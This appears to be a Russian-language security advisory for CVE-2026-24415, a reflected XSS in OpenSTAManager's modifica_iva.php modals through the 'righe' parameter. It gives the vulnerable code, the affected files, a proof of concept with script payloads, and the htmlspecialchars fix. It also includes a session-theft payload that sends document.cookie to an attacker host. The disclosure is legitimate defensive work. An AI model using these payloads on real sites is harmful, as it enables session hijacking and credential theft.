
CVE-2026-24415 - OpenSTAManager подвержен XSS в modifica_iva.php через параметр righe
| Поле | Детали |
|---|
| CVE ID | CVE-2026-24415 |
| Серьёзность | MEDIUM |
| Уведомление | Просмотреть уведомление |
| Обнаружил | Lukasz Rybak |
Множественные отражённые XSS-уязвимости (Reflected Cross-Site Scripting) в OpenSTAManager v2.9.8 позволяют неаутентифицированным злоумышленникам выполнять произвольный JavaScript-код в контексте браузеров других пользователей через специально сформированные параметры URL, что потенциально может привести к перехвату сессий, краже учётных данных и несанкционированным действиям.
Уязвимый параметр: righe (GET)
OpenSTAManager v2.9.8 содержит множественные отражённые XSS-уязвимости в модальных окнах изменения счетов, заказов и контрактов. Приложение не выполняет надлежащую санитизацию пользовательского ввода из GET-параметра righe перед его отражением в HTML-выводе.
Расположение уязвимого кода:
Файл: /modules/contratti/modals/modifica_iva.php (строка 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
Параметр $_GET['righe'] напрямую выводится в HTML-атрибут value без какой-либо санитизации с помощью htmlspecialchars() или эквивалентных функций. Это позволяет злоумышленнику выйти за пределы контекста атрибута и внедрить произвольный HTML/JavaScript.
Все затронутые файлы:
/modules/contratti/modals/modifica_iva.php - строка 125, строка 167/modules/preventivi/modals/modifica_iva.php - строка 125, строка 167/modules/fatture/modals/modifica_iva.php - строка 121, строка 161/modules/ddt/modals/modifica_iva.php - строка 125, строка 167/modules/ordini/modals/modifica_iva.php - строка 125, строка 167/modules/interventi/modals/modifica_iva.php - строка 125, строка 167Предварительные условия:
Шаг 1: Вход в систему
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Шаг 2: Активация XSS Перейдите по следующему URL в браузере (или используйте curl с cookies):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
Протестированные URL (все уязвимы):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Ожидаемый результат: Всплывающее окно JavaScript alert отображает текущий cookie сессии, что подтверждает выполнение кода.
HTML-вывод (проверено на живом экземпляре):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Проверка:


Альтернативные полезные нагрузки:
Кража сессии: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Затронутые пользователи: Все аутентифицированные пользователи, имеющие доступ к модулям контрактов, счетов, коммерческих предложений или заказов.
Сценарий атаки:
Рекомендуемое исправление:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Примените это исправление ко всем затронутым файлам, перечисленным в разделе «Детали».
Эта CVE была раскрыта ответственным образом в соответствии с практиками скоординированного раскрытия уязвимостей. Представленная здесь информация предназначена только для образовательных и защитных целей.